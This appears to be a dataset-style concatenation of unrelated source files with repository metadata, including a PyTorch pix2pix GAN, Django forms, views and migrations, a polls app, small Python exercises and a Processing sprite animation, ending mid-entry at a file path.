super(CBlock, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
self.activation = act
self.lrelu = nn.LeakyReLU(0.2)
self.batch_norm = batch_norm
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, x):
if self.activation:
out = self.conv(self.lrelu(x))
else:
out = self.conv(x)
if self.batch_norm:
return self.bn(out)
else:
return out
# In[3]:
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=4, stride=2, padding=1, batch_norm=True, dropout=False):
super(DBlock, self).__init__()
self.deconv = nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, padding)
self.bn = nn.BatchNorm2d(out_channels)
self.drop = nn.Dropout(0.5)
self.relu = nn.ReLU(True)
self.batch_norm = batch_norm
self.dropout = dropout
def forward(self, x):
if self.batch_norm:
out = self.bn(self.deconv(self.relu(x)))
else:
out = self.deconv(self.relu(x))
if self.dropout:
return self.drop(out)
else:
return out
# In[17]:
class Generator(torch.nn.Module):
def __init__(self, in_channels=3, features=64,):
super(Generator, self).__init__()
# Encoder
self.conv1 = CBlock(in_channels, features, batch_norm=False)
self.conv2 = CBlock(features, features * 2)
self.conv3 = CBlock(features * 2, features * 4)
self.conv4 = CBlock(features * 4, features * 8)
self.conv5 = CBlock(features * 8, features * 8)
self.conv6 = CBlock(features * 8, features * 8)
self.conv7 = CBlock(features * 8, features * 8)
self.bottleneck = CBlock(features * 8, features * 8, batch_norm=False)
# Decoder
self.deconv1 = DBlock(features * 8, features * 8, dropout=True)
self.deconv2 = DBlock(features * 8 * 2, features * 8, dropout=True)
self.deconv3 = DBlock(features * 8 * 2, features * 8, dropout=True)
self.deconv4 = DBlock(features * 8 * 2, features * 8)
self.deconv5 = DBlock(features * 8 * 2, features * 4)
self.deconv6 = DBlock(features * 4 * 2, features * 2)
self.deconv7 = DBlock(features * 2 * 2, features)
self.final_up = DBlock(features * 2, in_channels, batch_norm=False)
def forward(self, x):
# Encoder
d1 = self.conv1(x)
d2 = self.conv2(d1)
d3 = self.conv3(d2)
d4 = self.conv4(d3)
d5 = self.conv5(d4)
d6 = self.conv6(d5)
d7 = self.conv7(d6)
bottleneck = self.bottleneck(d7)
# Decoder
up1 = self.deconv1(bottleneck)
up2 = self.deconv2(torch.cat([up1, d7], 1))
up3 = self.deconv3(torch.cat([up2, d6], 1))
up4 = self.deconv4(torch.cat([up3, d5], 1))
up5 = self.deconv5(torch.cat([up4, d4], 1))
up6 = self.deconv6(torch.cat([up5, d3], 1))
up7 = self.deconv7(torch.cat([up6, d2], 1))
out = self.final_up(torch.cat([up7, d1], 1))
out = nn.Tanh()(out)
return out
# In[24]:
class Discriminator(nn.Module):
def __init__(self, in_channels=3, out_channels=1, features=64):
super(Discriminator, self).__init__()
self.conv1 = CBlock(in_channels*2, features, act=False, batch_norm=False)
self.conv2 = CBlock(features, features * 2)
self.conv3 = CBlock(features * 2, features * 4)
self.conv4 = CBlock(features * 4, features * 8, stride=1)
self.conv5 = CBlock(features * 8, out_channels, stride=1, batch_norm=False)
def forward(self, x, label):
x = torch.cat([x, label], 1)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.conv5(x)
out = nn.Sigmoid()(x)
return out
# In[30]:
def test1():
x = torch.randn((1, 3, 256, 256))
model1 = Generator(in_channels=3, features=64)
preds1 = model1(x)
print(model1)
print(preds1.shape)
def test2():
x = torch.randn((1, 3, 256, 256))
y = torch.randn((1, 3, 256, 256))
model2 = Discriminator(in_channels=3, out_channels=1, features=64)
preds2 = model2(x, y)
print(model2)
print(preds2.shape)
if __name__ == "__main__":
test1()
test2()
|
[
"noreply@github.com"
] |
rosasha.noreply@github.com
|
4997c9339d9d0df9bba877982b2292b8987a2abf
|
c36bbf6dec27f09a68533757de1e89b8a23d03c0
|
/users/admin.py
|
40d785b716024ef290349df40d26afe26b06d303
|
[] |
no_license
|
burkero2/DjangoRestFrameScriptReview
|
6f4371c42b0dc131f388f649dbdb86c403c1afbe
|
2a6419a57946cb1bbf6418cd14387845c855982e
|
refs/heads/master
| 2023-04-23T13:39:52.563510
| 2021-05-05T10:21:10
| 2021-05-05T10:21:10
| 363,164,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 119
|
py
|
from django.contrib import admin
from users.models import User
admin.site.register(User)
# Register your models here.
|
[
"ronanburke@codeinstitute.net"
] |
ronanburke@codeinstitute.net
|
030646f3a5593f31e327c3222a129c8c220aa697
|
85db48abe193d15a7462c836ca04701f5350685e
|
/users/forms.py
|
ba31ab4b69690e5a62502e630f27e6f3bfd63047
|
[
"MIT"
] |
permissive
|
Sakkadas/Notes
|
bdc91f78e3c5b9b742e8d1c8458a4b860e76c0bd
|
e438f58957ca1737ca714b5619abf76535236f66
|
refs/heads/main
| 2023-08-10T18:26:29.489054
| 2021-09-29T23:51:28
| 2021-09-29T23:51:28
| 404,781,785
| 3
| 0
|
MIT
| 2021-09-29T23:51:29
| 2021-09-09T15:49:24
|
Python
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['image']
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
|
[
"eildos95@gmail.com"
] |
eildos95@gmail.com
|
db48bfd37481546197299de553669f6a9bf2992f
|
b87e9eb579b74e686fa849aee1ac03f8c121b9d2
|
/backend/src/pages/api/views.py
|
869d6bae3e375820f4f6027713a24b0284dc1b45
|
[] |
no_license
|
ashishsth7586/portfolio_ashish
|
1b5e5fdf718d70c33e987d856e1ab2b9bdf8873a
|
d631a915025d04fe02917110329b03b70e0537fd
|
refs/heads/master
| 2020-07-18T01:37:06.240431
| 2019-09-03T18:30:04
| 2019-09-03T18:30:04
| 206,145,237
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,322
|
py
|
from rest_framework import generics
from ..models import Landing, About, SocialMedia, Quote, Testimonial, Service
from .serializers import LandingSerializer, AboutSerializer, SocialMediaSerializer, QuotesSerializer, ServicesSerializer, TestimonialsSerializer
from rest_framework.permissions import IsAuthenticated
class LandingList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Landing.objects.all()
serializer_class = LandingSerializer
class AboutList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = About.objects.all()
serializer_class = AboutSerializer
class SocialMediaList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = SocialMedia.objects.all()
serializer_class = SocialMediaSerializer
class QuotesList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Quote.objects.all()
serializer_class = QuotesSerializer
class ServicesList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Service.objects.all()
serializer_class = ServicesSerializer
class TestimonialsList(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = Testimonial.objects.all()
serializer_class = TestimonialsSerializer
|
[
"ashishsth7586@gmail.com"
] |
ashishsth7586@gmail.com
|
80b80379f799a97a89a989a13151110accb63027
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=97/sched.py
|
8310502bd1912f44a7c659b2051b2246b0d18ba3
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
-X FMLP -Q 0 -L 5 124 400
-X FMLP -Q 0 -L 5 96 400
-X FMLP -Q 1 -L 4 85 250
-X FMLP -Q 1 -L 4 68 300
-X FMLP -Q 2 -L 4 68 400
-X FMLP -Q 3 -L 2 46 175
43 250
33 250
29 150
22 100
21 175
14 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
36bc561271b70d587b0f4fc8d18aa3b2886100ff
|
42dc3691d2d7c7ac45228ee59b205e861d5c6c2d
|
/2-4-Partition.py
|
db743f0a19197cd2ae2bbf9a7a014ece028ba084
|
[] |
no_license
|
jihua0125/CrackingCode
|
cc5f3b3198091f60609f0047f63069e8269149d2
|
55bf87609504c544004d4a434b35cb53ddb0b1dc
|
refs/heads/master
| 2020-12-02T19:33:59.096847
| 2017-07-10T02:33:59
| 2017-07-10T02:33:59
| 96,360,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 680
|
py
|
from linked_list import LinkedList
import numpy as np
def partition(ll,value):
current=ll.tail=ll.head
while current:
next_node=current.next
if current.data<value:
current.next=ll.head
ll.head=current
else:
ll.tail.next=current
ll.tail=current
current=next_node
if ll.tail.next !=None:
ll.tail.next = None
def main():
linked_list=LinkedList()
random_list=np.random.permutation([1,2,3,4,5,6,7,8,9,10])
for i in random_list:
linked_list.append(i)
print linked_list
partition(linked_list,7)
print linked_list
if __name__=='__main__':
main()
|
[
"410763264@qq.com"
] |
410763264@qq.com
|
56013a18d49abb0d2dd5186db5775fc905270132
|
df1afc930ffba283c163d08a3692d14c02fd4766
|
/final test/tests/CreateTestFiles.py
|
0dab059af8f7e60fac7c2469774997c7f8c30ec5
|
[] |
no_license
|
asafweinberg/swProject
|
f2b95f4b6073727a90c0fddbb2e93a675a629d1f
|
f0651426bb9556be45494a43dc1afa3bcc1c561a
|
refs/heads/main
| 2023-07-19T12:09:29.223577
| 2021-09-11T11:48:29
| 2021-09-11T11:48:29
| 395,636,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
import pandas as pd
import numpy as np
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
import os
'''Creates the files for all goals except jacobi'''
filesToCreate = pd.read_csv(os.path.join(".", "tests", "FilesToCreate.csv"))
i = 0
for row in filesToCreate.itertuples():
if (i == 10):
continue
n_centers = row.n_clusters
samples = row.n_samples
features = row.features
file_name = f"test{i}.csv"
X, y = make_blobs(n_samples=samples, centers=n_centers, n_features=features,
random_state=31, shuffle=True, cluster_std=0.3)
resultPath = os.path.join(".", "tests", "test_data", "spk_tests", file_name)
np.savetxt(resultPath, X, delimiter=",", fmt="%.4f")
#plt.plot(X[:, 0], X[:, 1], 'o', label = 'data')
#plt.show()
i += 1
'''Creates the files for jacobi'''
np.random.seed(0)
dim = 2
for i in range(12):
if (i == 11):
continue
mat = np.random.rand(dim, dim)
mat = np.tril(mat) + np.tril(mat, -1).T
resultPath = os.path.join(".", "tests", "test_data", 'jacobi_tests',f"test{i}.csv")
np.savetxt(resultPath, mat, delimiter=",", fmt="%.4f")
dim += 1
|
[
"73112049+Carinz@users.noreply.github.com"
] |
73112049+Carinz@users.noreply.github.com
|
10c611ca3601f9e0af871f32c73bc6fd9ea86f67
|
eb38334d649bfc037b7680e873179d5f7bdeaa9a
|
/Clase2/main.py
|
cca294bba234f2f478627f3e35b3688afe2a3992
|
[] |
no_license
|
VirtualEvan/Practicas_ALS
|
2e96339eec34fbacc6a7a308a08b512b45fdf143
|
fbc613b766e99815216cffa5c1ebc3348a06aeaf
|
refs/heads/master
| 2021-01-18T13:14:36.195231
| 2017-05-10T15:51:08
| 2017-05-10T15:51:08
| 80,743,083
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
l = [1, 2, 3]
# Imprime una lista
print(l)
# Imprime un array completo
for x in l:
print(x, end=' ')
print()
for i, x in enumerate(l):
print(str.format("{0}: {1}", i, x), end=', ')
#Número de elementos
print("\nNúmero de elementos: ", len(l))
#Slices
#Del segundo en adelante
print("\nDel segundo en adelante: ", l[1:])
#Por rangos
print("\nDel segundo en adelante: ", l[0:2])
#Hasta el segundo
print("\nDel segundo en adelante: ", l[:2])
# Último elemento
print("\nÚltimo elemento: ", l[-1])
# "Comprension" de listas
# nueva_lista = [ <expr> for <id> in <expr que devuelve una lista> ]
print("\n", list([float(x) for x in l]))
# <cond>? <val1>:<val2>
# | En Python
# V
# <val1> if <cond> else <val2>
print([x for x in l if x % 2 == 0])
# Fibonacci que chachi
def fibonacci(x):
toret = [0, 1]
if x == 1:
print([0, 1])
for _ in range(x-2):
toret.append(toret[-2] + toret[-1])
print("Fibonnaci", toret)
fibonacci(4)
# Primos
def primos(x):
"""
Returns a list with the first x prime numbers.
:param x: A given natural numbers
:return: True if prime, False otherwise
"""
def esprimo(n):
"""
Determines whether a natural number is a prime number
:param n: Agiven natural number
:return: True if prime, False otherwise
"""
toret = False
if x == 2:
toret = True
elif x % 2 == 0:
toret = False
else:
for i in range(3, x, 2):
if x % i == 0:
break
else:
toret = True
# Se ejecuta cuando no se rompe el bucle
return toret
toret = []
for i in range(0, x):
if esprimo(i):
toret.append(i)
return toret
print("Primos: ", primos(10))
|
[
"virtualevan@gmail.com"
] |
virtualevan@gmail.com
|
744dfd4eea05bb5f89cb394fc9b7a7d0ad5e9d41
|
1b532f79e859705052ec77404fff3d4da5de0029
|
/5.py
|
3fbc31bf3dac5fc18bb76d7bb61004d1c569bd21
|
[] |
no_license
|
salmanchik1/Project_Euler
|
270808f6e5785669d970b63cfd111bf7250bfe82
|
1e8a322dbded17366c1b2d841a2645332c9114d6
|
refs/heads/master
| 2021-07-08T03:23:13.123859
| 2020-11-05T20:49:07
| 2020-11-05T20:49:07
| 203,200,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
# This algorithm written in Python 3.7
number = 1
maxim = 20
divs = list()
for i in range(2, maxim+1):
temp = i
for d in divs:
if temp % d == 0:
temp = int(temp / d)
if temp > 1:
divs.append(temp)
for i in divs:
number *= i
print("The smallest number divisible by all the numbers "
"from 1 to {} is {}".format(maxim, number))
|
[
"salmanov.ramis@gmail.com"
] |
salmanov.ramis@gmail.com
|
a54fc74712c2351e533d5d191a62f6d9f51adafe
|
043758666a3e92fb301249d0d09047827ec4aeaf
|
/yellowscrapper/yellowscrapper-backup.py
|
74b76d163cabe7b3d759b74f61a6662209e90d2d
|
[] |
no_license
|
oasisers99/auyellow
|
981aba4a7b9c2d3a545d8194c6c0c546aeef43f8
|
e8444d789236230b3c63ff1157d63bd461830c7a
|
refs/heads/master
| 2020-04-03T01:01:43.584647
| 2017-07-19T01:50:53
| 2017-07-19T01:50:53
| 95,749,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
import scrapy
#scrapy crawl yellow -o medical.json -t jsonlines
class YellowSpider(scrapy.Spider):
name = "yellow"
category = "medical"
start_urls = [
'https://www.yellowpages.com.au/search/listings?clue='+category+'&locationClue=australia',
]
def parse(self, response):
# Target the main list that does not have ads.
global category
for yellow in response.xpath("//div[@class='cell in-area-cell middle-cell']//a[@class='listing-name']"):
yield {
'category': category,
'business_name': yellow.css("::text").extract_first(),
#'author': quote.css('small.author::text').extract_first(),
#'tags': quote.css('div.tags a.tag::text').extract(),
}
# Target the 'next' page link.
next_page = response.xpath("//a[@class='pagination navigation'][last()]/@href").extract_first()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
|
[
"minseok@proviso.com.au"
] |
minseok@proviso.com.au
|
437cfbfa7c38cf89e1a99c34ac5bd06994a25269
|
c78f8b10dee1be23ec69b1140066a3b555cd19fa
|
/climatevis/ClimateApp/tempCodeRunnerFile.py
|
0c63b1cb874ae082af86c4027f90f21a9148e7a7
|
[] |
no_license
|
ishancoderr/ClimateApp
|
b49ef10363147005de433af9121be958e82f6c8d
|
9b5a0e1877cf0ce99fe59976e2454bfa443c6dd0
|
refs/heads/main
| 2023-03-14T13:38:25.458507
| 2021-03-17T13:37:45
| 2021-03-17T13:37:45
| 348,718,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
from django.urls import path
urlpatterns = [
path(' ',views.IndexView,name="home"),
path('dashboard/', views.dashboardView,name="dashboard"),
path('login/',),
path('register/',),
path('logout/',),
|
[
"noreply@github.com"
] |
ishancoderr.noreply@github.com
|
d8f26552c908700a66965cea7e9d501644e592e1
|
6a54f6ed872a990669c1f75eaeae51e99ef2268c
|
/prefix-1.py
|
c5a359f626c175767f12e49f03cbca5f859b1bd9
|
[] |
no_license
|
SamK1102/CA116
|
f3d872f5c09b51cfcf9eca88803f8b11a42b470c
|
a0edf8ead224979187d41b94326abaabe5aa4a45
|
refs/heads/master
| 2020-04-06T14:57:41.595781
| 2018-12-04T15:48:37
| 2018-12-04T15:48:37
| 157,560,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/usr/bin/env python
if __name__ == "__main__":
a = ["mountain", "montagne", "mont", "mo", "montages", "zebra", "monthly"]
s = "mont"
i = 0
while i < len(a):
if (a[i][:len(s)] == s):
print a[i]
i = i + 1
|
[
"noreply@github.com"
] |
SamK1102.noreply@github.com
|
7682d6c07e4a6d11881df7f096b87f6cb3449778
|
0890a25baf9508092e6f3f90008eb47aefb1fd0d
|
/quickmansprite.pyde
|
7215c542f65c2060004f1cb89023be340c453930
|
[] |
no_license
|
kiwi-fruitiwi/quickmansprite
|
3dd0731cedb9cd6ee2e19261270fbefd1ec79977
|
23736f0c26b27fbfd71ef27a07bf8f9323b6974b
|
refs/heads/main
| 2023-07-26T00:32:21.564367
| 2021-09-02T22:43:05
| 2021-09-02T22:43:05
| 389,968,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,006
|
pyde
|
# Coding Challenge #111: animated sprite
# 2021.07.27
# We're planning to animate Quick Man from Mega Man 2
# see https://www.youtube.com/watch?v=8s_00b0stJU for mm2 gameplay
#
# v0.01 animate quick man boss intro sequence with custom spritesheet
# v0.02 cut and animate walking sequence
# explore: how do we reverse an image?
# v0.03 draw walking quickman and use WASD to initiate walking animation
# v0.04 cut and animate jumping sequence » W to jump
# v0.05 cut and animate block
# v0.06 shoot + boomerangs
#
#
#
# BUG: image uses a top left rectangle coordinate but we want center
from Sprite import Sprite
def setup():
global sprites, mirror
colorMode(HSB, 360, 100, 100, 100)
spritesheet = loadImage("quickman-run-shoot-boomerangs.png")
size(700, 300)
# frameRate(10)
delay(100) # with no delay we never get to see the 1st frame
ichi = spritesheet.get(0, 32, 32, 32)
ni = spritesheet.get(32, 32, 32, 32)
san = spritesheet.get(64, 32, 32, 32)
imgs = [ni, ichi, ni, san]
sprites = []
mirror = False
# for i in range(9):
# sprites.append(Sprite(imgs, 10, 10 + i * 32, random(0.15, 0.25), move=True))
# sprites.append(sprite_quickman_intro())
for i in range(100):
particle = Sprite(imgs, random(width), random(height), random(0.15, 0.25), move=True)
sprites.append(particle)
def draw():
global sprites, mirror
background(209, 95, 33)
for sprite in sprites:
sprite.update()
sprite.edges()
sprite.animate()
sprite.show()
# for sprite in sprites:
# if mirror:
# sprite.show_mirror()
# else:
# sprite.show()
# sprite.animate()
def keyPressed():
global mirror
if key == 'm':
mirror = not mirror
# returns a quick man intro sprite sequence
def sprite_quickman_intro():
spritesheet = loadImage("quickman-intro.png")
SPRITE_DIMENSIONS = 32
s = 3 * SPRITE_DIMENSIONS # desired sprite size scale factor
# put each frame in an imgs list starting with []
imgs = []
for i in range(8):
img = spritesheet.get(i*SPRITE_DIMENSIONS, 0, 32, 32)
img.resize(s, s)
imgs.append(img)
# for i in range(9):
# sprites.append(Sprite(imgs, 10, 10 + i * 32, random(0.15, 0.25)))
# quick man intro sequence
intro = Sprite(imgs, width/2 - s/2, height/2 - s/2, 0.15, move=False)
return intro
# this code displays quick man's 8-frame intro animation
def spriteless_quickman_intro():
spritesheet = loadImage("quickman-intro.png")
# allows us to select the position of the sprite in the sprite sheet
# as a function of the framecount
x = frameCount % 8 * 32
# All robot master sprites in mega man 2 are 32x32.
#
# The original spritesheet had too little space between each quickman,
# I edited the file and fixed this.
#
# The boss intro sprites start at 0,0 and are 32x32 across 8 sprites
SPRITE_DIMENSIONS = 32
img = spritesheet.get(x, 0, 32, 32)
s = SPRITE_DIMENSIONS * 3 # s is the side length of a square sprite
img.resize(s, s) # let's make it easier to see and debug
# center the sprite on the canvas using its side length, s
image(img, width/2 - s/2, height/2 - s/2)
# our original code without using our Sprite object
def objectless_sprite():
spritesheet = loadImage("quickman-run-shoot-boomerangs.png")
ichi = spritesheet.get(0, 32, 32, 32)
ni = spritesheet.get(32, 32, 32, 32)
san = spritesheet.get(64, 32, 32, 32)
imgs = [ni, ichi, ni, san]
SPRITE_DIMENSIONS = 32
s = SPRITE_DIMENSIONS * 3 # s is the side length of a square sprite
for img in imgs:
img.resize(s, s) # let's make it easier to see and debug
image(imgs[frameCount % len(imgs)], width/2-s/2, height/2 - s/2)
|
[
"zane.tian@gmail.com"
] |
zane.tian@gmail.com
|
6b34f7ac5fa39f607628f1f9a9cb7721a347f201
|
c1e93f2110db91b22609762aa1c9cfcf608c0975
|
/music/migrations/0006_auto_20200523_1934.py
|
389d3011f271ef1dd7e441c917ad3957049e11bf
|
[] |
no_license
|
eliyajoseph7/music_app
|
6f49979726b65cc9b664602acd263d2b787128b0
|
802780e6186f7cd3ba27a4b1c21f09f701c7cb1e
|
refs/heads/master
| 2022-07-04T22:54:22.775210
| 2020-05-24T19:44:38
| 2020-05-24T19:44:38
| 264,457,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Generated by Django 3.0.2 on 2020-05-23 16:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('music', '0005_auto_20200523_1831'),
]
operations = [
migrations.AlterModelOptions(
name='wordsofwisdom',
options={'ordering': ['date']},
),
migrations.AlterField(
model_name='wordsofwisdom',
name='image',
field=models.ImageField(default='scoan.png', upload_to='wisdom_images'),
),
]
|
[
"exaveryeliya20@gmail.com"
] |
exaveryeliya20@gmail.com
|
ef0c8cfa4b93452b1906d594b5415c9bac502824
|
6b1f5f6597d51125e0cfae59300ea75153e3e498
|
/Test/myChart.py
|
c4e31c161b3a62d8714684977ca82fce2a50cbc3
|
[] |
no_license
|
zhangzongbo/spider
|
3eba26e212703cdd1ddbf760c1ffa623f03f08ad
|
8dfd98b1e2e2f5a4401c4f682dda2016939f2d0c
|
refs/heads/master
| 2020-03-25T14:12:25.996603
| 2019-08-13T07:52:19
| 2019-08-13T07:52:19
| 143,855,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
from pyecharts import Bar
bar = Bar("我的第一个图表", "这里是副标题")
bar.use_theme('dark')
bar.add("服装", ["衬衫", "羊毛衫", "雪纺衫", "裤子", "高跟鞋", "袜子"], [5, 20, 36, 10, 75, 90])
bar.add("topK", ["张悬", "晚安", "荣幸", "何其", "珍惜", "爱心", "真的", "时候", "拥抱", "知道", "关于", "没有", "首歌", "自己",
"喜欢", "侥幸", "拥有", "人生", "失去", "我爱你"], [0, 302, 357, 362, 401, 484, 626, 816, 865, 964, 1056, 1129,
1185, 1503, 2118, 2618, 2655, 2706, 2758, 2983])
bar.render()
|
[
"zhangzongbo1994@gmail.com"
] |
zhangzongbo1994@gmail.com
|
d9ab06c72d99dfe38d4dd22f885bc5a20e145dc0
|
e21a22e5c7c92b28460b75106a965c81327ae6e4
|
/polls/views.py
|
410746ed5adda2ee205827bee8e07605173a0ee8
|
[
"MIT"
] |
permissive
|
vakhov/django-vote-example
|
356e031483b292eadaefd6087d89ebc52fe8c7a5
|
0e27e07d9cdfd2bcc06635bf2a79e7ef5d225f4f
|
refs/heads/master
| 2020-07-30T14:20:17.670548
| 2017-11-05T15:37:36
| 2017-11-05T15:37:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,480
|
py
|
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from django.utils import timezone
from .models import Question, Choice
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""Return the last five published questions."""
return Question.objects.order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
|
[
"yxwzaxns@gmail.com"
] |
yxwzaxns@gmail.com
|
3f135cd5cd8056baca9a2970e258d3bbce6ca2e5
|
a271140b2895c637512850394cd701ff6e519eba
|
/Ejemplo8.py
|
44945e80efb38d64be168e8a7713e7f5673c5330
|
[] |
no_license
|
AntonioCatalanSanchez/EjerciciosPython
|
200ec456d3fc31e710602d509d124ceff0df345c
|
a849b5575ee385c23daf16e2b0ee1380ef7a4ff1
|
refs/heads/master
| 2020-05-04T22:04:10.870937
| 2019-04-04T12:59:37
| 2019-04-04T12:59:37
| 179,498,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
x=2
numero=int(input("introduce un numero: "))
while(numero != 1):
if(numero % x==0):
print (str(x))
numero=numero/x
else:
x = x + 1
|
[
"antonio.catalansanchez@telefonica.com"
] |
antonio.catalansanchez@telefonica.com
|
769fc6529e818632e8697f4316f134bee5fd1efc
|
797ba1fee05e90bea95964f12c5e9ca3bb889dca
|
/feed/migrations/0010_feed_image.py
|
80a738b16f7051b87554822e38e23927f449054d
|
[] |
no_license
|
sanjanaasinha/insta-me
|
3b12383164e07a28444c0e36d65ad52869bedb94
|
6ede9c8c3a67cf9b22cc0fcd92d5a3d42aa2b46e
|
refs/heads/master
| 2021-09-08T00:51:28.452384
| 2018-03-04T18:39:44
| 2018-03-04T18:39:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 541
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-24 16:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('feed', '0009_remove_feed_image'),
]
operations = [
migrations.AddField(
model_name='feed',
name='image',
field=models.FileField(default=django.utils.timezone.now, upload_to=''),
preserve_default=False,
),
]
|
[
"sanjana.ss.sinha@gmail.com"
] |
sanjana.ss.sinha@gmail.com
|
694bbf8a0bc9a70bcc2d0decb623a43285ed0a43
|
1c3fb3c990bd07259c1701c709a28ec45cd0c748
|
/services/core-api/app/api/now_applications/resources/now_application_import_resource.py
|
d81a820815a7f11229bf5e30b97e659e6572e3c3
|
[
"Apache-2.0"
] |
permissive
|
usingtechnology/mds
|
f973106232f73f773bb4bb57737094dd32b1bd3c
|
c9c542f729df21511ee46e184ea752bad0b7d10c
|
refs/heads/master
| 2022-04-13T07:56:59.060216
| 2020-03-21T22:43:05
| 2020-03-21T22:43:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,693
|
py
|
import uuid
from datetime import datetime
from decimal import Decimal
from flask import request, current_app
from flask_restplus import Resource
from werkzeug.exceptions import BadRequest, InternalServerError, NotFound
from app.extensions import api
from app.api.utils.access_decorators import requires_role_view_all, requires_role_edit_permit, requires_any_of, VIEW_ALL
from app.api.utils.resources_mixins import UserMixin
from app.api.utils.custom_reqparser import CustomReqparser
from app.api.mines.mine.models.mine import Mine
from app.api.now_applications.models.now_application_identity import NOWApplicationIdentity
from app.api.now_applications.models.now_application import NOWApplication
from app.api.now_applications.models.activity_summary.exploration_access import ExplorationAccess
from app.api.now_applications.models.activity_summary.exploration_surface_drilling import ExplorationSurfaceDrilling
from app.api.now_applications.models.unit_type import UnitType
from app.api.now_applications.models.activity_detail.exploration_surface_drilling_detail import ExplorationSurfaceDrillingDetail
from app.api.now_applications.transmogrify_now import transmogrify_now
class NOWApplicationImportResource(Resource, UserMixin):
parser = CustomReqparser()
parser.add_argument('mine_guid', type=str, help='guid of the mine.', required=True)
parser.add_argument(
'longitude',
type=lambda x: Decimal(x) if x else None,
help='Longitude point for the Notice of Work.',
location='json')
parser.add_argument(
'latitude',
type=lambda x: Decimal(x) if x else None,
help='Latitude point for the Notice of Work.',
location='json')
@requires_role_edit_permit
@api.expect(parser)
def post(self, application_guid):
data = self.parser.parse_args()
mine_guid = data.get('mine_guid')
latitude = data.get('latitude')
longitude = data.get('longitude')
mine = Mine.find_by_mine_guid(mine_guid)
if not mine:
raise NotFound('Mine not found')
now_application_identity = NOWApplicationIdentity.query.filter_by(
now_application_guid=application_guid).first()
if not now_application_identity:
raise NotFound('No identity record for this application guid.')
application = transmogrify_now(now_application_identity)
application.mine_guid = mine_guid
application.latitude = latitude
application.longitude = longitude
application.now_application_guid = application_guid
application.save()
return {'now_application_guid': str(application.now_application_guid)}
|
[
"bcgov-csnr-cd@gov.bc.ca"
] |
bcgov-csnr-cd@gov.bc.ca
|
8a3ffbbf040fed8d8a8b53a2550dfa256919edbb
|
d24cf7a2691f52ef2caf4578f8ee1feee3bab9e3
|
/computeQuantizationError.py
|
